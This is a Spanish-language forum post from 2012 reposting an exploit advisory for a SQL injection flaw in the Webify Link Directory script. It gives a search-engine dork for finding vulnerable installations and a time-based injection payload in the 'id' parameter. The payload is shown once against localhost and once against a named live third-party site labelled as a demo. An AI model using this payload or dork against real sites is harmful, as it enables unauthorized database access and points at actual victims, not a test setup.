Hack x Crack - Comunidad de Seguridad informática

Seguridad Informatica => Hacking => Mensaje iniciado por: #RemoteExecution en Julio 04, 2012, 10:56:42 am

Título: Webify Link Directory / SQL Injection
Publicado por: #RemoteExecution en Julio 04, 2012, 10:56:42 am
# Exploit Title: Webify Link Directory / SQL Injection
# Date: 04/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar (http://www.delincuentedigital.com.ar)
# Sofware web: http://webify.ws/index.php?page=getapp&id=10 (http://webify.ws/index.php?page=getapp&id=10)
# Tested on: Linux
# Dork: allinurl: index.php?page=browse&id=1
#
# www.chap.cl (http://www.chap.cl)
# Este Advisory fue descubierto por Daniel Godoy, integrante de Project CHAP Security
# be secured / stay secure
# [email protected]


[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info (http://www.remoteexecution.info) www.remoteexcution.com.ar (http://www.remoteexcution.com.ar)
#RemoteExecution Hacking Group



[PoC]

http://localhost/index.php?page=browse&id=1 (http://localhost/index.php?page=browse&id=1)' AND SLEEP(0) AND 'chap'='chap

[DEMO]

http://grandrapidslinks.com/index.php?page=browse&id=1 (http://grandrapidslinks.com/index.php?page=browse&id=1)' AND SLEEP(0) AND 'chap'='chap